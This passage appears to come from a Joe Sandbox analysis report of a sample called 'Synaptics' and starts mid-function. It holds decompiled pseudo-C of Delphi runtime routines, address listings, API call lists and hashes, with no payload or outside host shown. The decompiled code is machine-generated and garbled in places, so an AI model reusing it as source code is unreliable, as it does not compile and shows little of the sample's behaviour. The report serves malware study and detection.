                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _t161 - 0x14;
                                                                                                                                                                                                                            					if(_t161 > 0x14) {
                                                                                                                                                                                                                            						goto L101;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
                                                                                                                                                                                                                            						case 0:
                                                                                                                                                                                                                            							0 = E004214B8(0, __ebx, __edi, __esi);
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						case 1:
                                                                                                                                                                                                                            							goto L101;
                                                                                                                                                                                                                            						case 2:
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(0xb01a);
                                                                                                                                                                                                                            							_v8 =  *(_v8 + 0x30);
                                                                                                                                                                                                                            							_push( *(_v8 + 0x30));
                                                                                                                                                                                                                            							L00407848();
                                                                                                                                                                                                                            							__eax = E004598AC(__ebp);
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						case 3:
                                                                                                                                                                                                                            							__eax = _v12;
                                                                                                                                                                                                                            							__eflags =  *(__eax + 4);
                                                                                                                                                                                                                            							if( *(__eax + 4) == 0) {
                                                                                                                                                                                                                            								__eax = E004598AC(__ebp);
                                                                                                                                                                                                                            								__eax = _v8;
                                                                                                                                                                                                                            								__eflags =  *(__eax + 0xac);
                                                                                                                                                                                                                            								if( *(__eax + 0xac) == 0) {
                                                                                                                                                                                                                            									__eax = _v8;
                                                                                                                                                                                                                            									__eax =  *(_v8 + 0x30);
                                                                                                                                                                                                                            									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
                                                                                                                                                                                                                            									__edx = _v8;
                                                                                                                                                                                                                            									 *(_v8 + 0xac) = __eax;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_v8 = L00459744();
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v8 = E0045974C(_v8);
                                                                                                                                                                                                                            								__eax = _v8;
                                                                                                                                                                                                                            								__eax =  *(_v8 + 0xac);
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								if(__eax != 0) {
                                                                                                                                                                                                                            									__eax = _v8;
                                                                                                                                                                                                                            									__edx = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									 *(_v8 + 0xac) = 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eax = E004598AC(__ebp);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						case 4:
                                                                                                                                                                                                                            							__eax = _v8;
                                                                                                                                                                                                                            							__eax =  *(_v8 + 0x30);
                                                                                                                                                                                                                            							_push(__eax);
                                                                                                                                                                                                                            							L004077A8();
                                                                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                                                                            							if(__eax == 0) {
                                                                                                                                                                                                                            								__eax = E004598AC(__ebp);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eax = E004598E8(__ebp);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						case 5:
                                                                                                                                                                                                                            							__eax = _v8;
                                                                                                                                                                                                                            							__eax =  *(_v8 + 0x44);
                                                                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                                                                            							if(__eax != 0) {
                                                                                                                                                                                                                            								__eax = E00456FEC(__eax, __ecx);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						case 6:
                                                                                                                                                                                                                            							__eax = _v12;
                                                                                                                                                                                                                            							 *_v12 = 0x27;
                                                                                                                                                                                                                            							__eax = E004598AC(__ebp);
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t316 = _t306 + 1;
                                                                                                                                                                                                                            					_t376 = 0;
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t166 = 0;
                                                                                                                                                                                                                            						_pop(_t366);
                                                                                                                                                                                                                            						 *[fs:eax] = _t366;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L103:
                                                                                                                                                                                                                            					return _t166;
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					_t376 = _t376 + 1;
                                                                                                                                                                                                                            					_t316 = _t316 - 1;
                                                                                                                                                                                                                            					__eflags = _t316;
                                                                                                                                                                                                                            					if(_t316 != 0) {
                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x00459fe3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459af2
                                                                                                                                                                                                                            0x00459ac2
                                                                                                                                                                                                                            0x00459f1d
                                                                                                                                                                                                                            0x00459f20
                                                                                                                                                                                                                            0x00459f24
                                                                                                                                                                                                                            0x00459f4c
                                                                                                                                                                                                                            0x00459f26
                                                                                                                                                                                                                            0x00459f34
                                                                                                                                                                                                                            0x00459f34
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459f24
                                                                                                                                                                                                                            0x00459ac8
                                                                                                                                                                                                                            0x00459ac8
                                                                                                                                                                                                                            0x00459acd
                                                                                                                                                                                                                            0x00459ecb
                                                                                                                                                                                                                            0x00459ed0
                                                                                                                                                                                                                            0x00459ed2
                                                                                                                                                                                                                            0x00459ed8
                                                                                                                                                                                                                            0x00459edd
                                                                                                                                                                                                                            0x00459ee0
                                                                                                                                                                                                                            0x00459ee3
                                                                                                                                                                                                                            0x00459eeb
                                                                                                                                                                                                                            0x00459ef0
                                                                                                                                                                                                                            0x00459ef2
                                                                                                                                                                                                                            0x00459ef9
                                                                                                                                                                                                                            0x00459ef9
                                                                                                                                                                                                                            0x00459ef2
                                                                                                                                                                                                                            0x00459ee3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ed2
                                                                                                                                                                                                                            0x00459ad3
                                                                                                                                                                                                                            0x00459ad6
                                                                                                                                                                                                                            0x00459f03
                                                                                                                                                                                                                            0x00459f13
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459adc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459adc
                                                                                                                                                                                                                            0x00459ad6
                                                                                                                                                                                                                            0x00459a6c
                                                                                                                                                                                                                            0x00459dde
                                                                                                                                                                                                                            0x00459de1
                                                                                                                                                                                                                            0x00459de3
                                                                                                                                                                                                                            0x00459de9
                                                                                                                                                                                                                            0x00459ded
                                                                                                                                                                                                                            0x00459df2
                                                                                                                                                                                                                            0x00459df4
                                                                                                                                                                                                                            0x00459e02
                                                                                                                                                                                                                            0x00459e07
                                                                                                                                                                                                                            0x00459e09
                                                                                                                                                                                                                            0x00459e17
                                                                                                                                                                                                                            0x00459e1c
                                                                                                                                                                                                                            0x00459e1e
                                                                                                                                                                                                                            0x00459e24
                                                                                                                                                                                                                            0x00459e2b
                                                                                                                                                                                                                            0x00459e3a
                                                                                                                                                                                                                            0x00459e53
                                                                                                                                                                                                                            0x00459e59
                                                                                                                                                                                                                            0x00459e5e
                                                                                                                                                                                                                            0x00459e68
                                                                                                                                                                                                                            0x00459e68
                                                                                                                                                                                                                            0x00459e1e
                                                                                                                                                                                                                            0x00459e09
                                                                                                                                                                                                                            0x00459df4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459de3
                                                                                                                                                                                                                            0x00459a72
                                                                                                                                                                                                                            0x00459a77
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa7
                                                                                                                                                                                                                            0x00459e9c
                                                                                                                                                                                                                            0x00459e9f
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459aad
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459dbf
                                                                                                                                                                                                                            0x00459dc4
                                                                                                                                                                                                                            0x00459dc6
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459a79
                                                                                                                                                                                                                            0x00459e74
                                                                                                                                                                                                                            0x00459e77
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a84
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459b1b
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00459b28
                                                                                                                                                                                                                            0x00459b16
                                                                                                                                                                                                                            0x00459b33
                                                                                                                                                                                                                            0x00459b38
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a8c
                                                                                                                                                                                                                            0x00459cc0
                                                                                                                                                                                                                            0x00459b56
                                                                                                                                                                                                                            0x00459b59
                                                                                                                                                                                                                            0x00459b5c
                                                                                                                                                                                                                            0x00459b5d
                                                                                                                                                                                                                            0x00459b62
                                                                                                                                                                                                                            0x00459b64
                                                                                                                                                                                                                            0x00459b73
                                                                                                                                                                                                                            0x00459b66
                                                                                                                                                                                                                            0x00459b67
                                                                                                                                                                                                                            0x00459b6c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b3e
                                                                                                                                                                                                                            0x00459b41
                                                                                                                                                                                                                            0x00459b44
                                                                                                                                                                                                                            0x00459b46
                                                                                                                                                                                                                            0x00459b4c
                                                                                                                                                                                                                            0x00459b4c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b7e
                                                                                                                                                                                                                            0x00459b81
                                                                                                                                                                                                                            0x00459b88
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045996a
                                                                                                                                                                                                                            0x0045996a
                                                                                                                                                                                                                            0x0045996b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045996d
                                                                                                                                                                                                                            0x00459989
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045998b
                                                                                                                                                                                                                            0x0045998b
                                                                                                                                                                                                                            0x0045998d
                                                                                                                                                                                                                            0x00459990
                                                                                                                                                                                                                            0x00459990
                                                                                                                                                                                                                            0x0045a003
                                                                                                                                                                                                                            0x0045a009
                                                                                                                                                                                                                            0x00459998
                                                                                                                                                                                                                            0x00459998
                                                                                                                                                                                                                            0x00459999
                                                                                                                                                                                                                            0x00459999
                                                                                                                                                                                                                            0x0045999a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045999a

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: RegisterAutomation$vcltest3.dll
                                                                                                                                                                                                                            • API String ID: 0-2963190186
                                                                                                                                                                                                                            • Opcode ID: d329678bbdbb713eb9c76e5ad5b00894dd35fa5d4201317eb8747025065c78f8
                                                                                                                                                                                                                            • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d329678bbdbb713eb9c76e5ad5b00894dd35fa5d4201317eb8747025065c78f8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 474 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 475 406313-406317 474->475 476 4063f6-4063fd 474->476 477 406323-406339 lstrlen 475->477 478 406319-40631d 475->478 479 40633c-40633f 477->479 478->476 478->477 480 406341-406349 479->480 481 40634b-406353 479->481 480->481 482 40633b 480->482 481->476 483 406359-40635e 481->483 482->479 484 406360-406386 lstrcpyn LoadLibraryExA 483->484 485 406388-40638a 483->485 484->485 485->476 486 40638c-406390 485->486 486->476 487 406392-4063c2 lstrcpyn LoadLibraryExA 486->487 487->476 488 4063c4-4063f4 lstrcpyn LoadLibraryExA 487->488 488->476
                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E004062DC() {
                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                            				char* _t51;
                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t59;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0x105);
                                                                                                                                                                                                                            				_push( *((intOrPtr*)(_t61 - 4)));
                                                                                                                                                                                                                            				_push(_t61 - 0x11d);
                                                                                                                                                                                                                            				L0040131C();
                                                                                                                                                                                                                            				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                                                                                                                                                                                            				_t59 = 0;
                                                                                                                                                                                                                            				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					return _t59;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t28 = _t61 - 0x11d;
                                                                                                                                                                                                                            					_push(_t28);
                                                                                                                                                                                                                            					L00401324();
                                                                                                                                                                                                                            					_t51 = _t28 + _t61 - 0x11d;
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                                                                                                                                                                                            						_t51 = _t51 - 1;
                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 = _t61 - 0x11d;
                                                                                                                                                                                                                            					if(_t51 != _t30) {
                                                                                                                                                                                                                            						_t52 = _t51 + 1;
                                                                                                                                                                                                                            						if( *((char*)(_t61 - 0x12)) != 0) {
                                                                                                                                                                                                                            							_push(0x105 - _t52 - _t30);
                                                                                                                                                                                                                            							_push(_t61 - 0x12);
                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                            							L0040131C();
                                                                                                                                                                                                                            							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                                                                                                                                                                                            							_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                                                                                                                                                            							_push(_t61 - 0xd);
                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                            							L0040131C();
                                                                                                                                                                                                                            							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                                                                                                                                                            							_t59 = _t36;
                                                                                                                                                                                                                            							if(_t59 == 0) {
                                                                                                                                                                                                                            								 *((char*)(_t61 - 0xb)) = 0;
                                                                                                                                                                                                                            								_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                                                                                                                                                            								_push(_t61 - 0xd);
                                                                                                                                                                                                                            								_push(_t52);
                                                                                                                                                                                                                            								L0040131C();
                                                                                                                                                                                                                            								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                                                                                                                                                            								_t59 = _t42;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                            • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099E0(void* __eax) {
                                                                                                                                                                                                                            				short _v6;
                                                                                                                                                                                                                            				short _v8;
                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
                                                                                                                                                                                                                            				if(_t16 == 0xffffffff) {
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					_v8 = 0xffffffff;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					FindClose(_t16); // executed
                                                                                                                                                                                                                            					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                                                                                                                                                                                                                            						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000,00476872,?,00000000), ref: 004099FB
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000,00476872), ref: 00409A06
                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000), ref: 00409A1F
                                                                                                                                                                                                                            • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2659516521-0
                                                                                                                                                                                                                            • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0043F118(void* __eax, intOrPtr* __edx) {
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t67 = __edx;
                                                                                                                                                                                                                            				_t50 = __eax;
                                                                                                                                                                                                                            				_t17 =  *__edx;
                                                                                                                                                                                                                            				_t68 = _t17 - 0x84;
                                                                                                                                                                                                                            				if(_t68 > 0) {
                                                                                                                                                                                                                            					_t19 = _t17 + 0xffffff00 - 9;
                                                                                                                                                                                                                            					if(_t19 < 0) {
                                                                                                                                                                                                                            						_t21 = E0043B6EC(__eax);
                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                            							L28:
                                                                                                                                                                                                                            							return _t21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L27:
                                                                                                                                                                                                                            						_t23 = E0043C1FC(_t50, _t67); // executed
                                                                                                                                                                                                                            						return _t23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                                                                                                                                                                                            						_t21 = E0043F084(__eax, _t51, __edx);
                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t21 = E00441A08(_t50);
                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t67 + 8)));
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t67 + 4)));
                                                                                                                                                                                                                            						_push( *_t67);
                                                                                                                                                                                                                            						_t32 = E00441704(_t50);
                                                                                                                                                                                                                            						_push(_t32);
                                                                                                                                                                                                                            						L00407540();
                                                                                                                                                                                                                            						return _t32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L27;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t68 == 0) {
                                                                                                                                                                                                                            					_t21 = E0043C1FC(__eax, __edx);
                                                                                                                                                                                                                            					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                                                                                                                                                                                            					E0043AAC0(_t50,  &_v28,  &_v20);
                                                                                                                                                                                                                            					_t21 = E0043EFF0(_t50, 0,  &_v28, 0);
                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t67 + 0xc)) = 1;
                                                                                                                                                                                                                            					return _t21;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t39 = _t17 - 7;
                                                                                                                                                                                                                            				if(_t39 == 0) {
                                                                                                                                                                                                                            					_t65 = E004519E0(__eax);
                                                                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
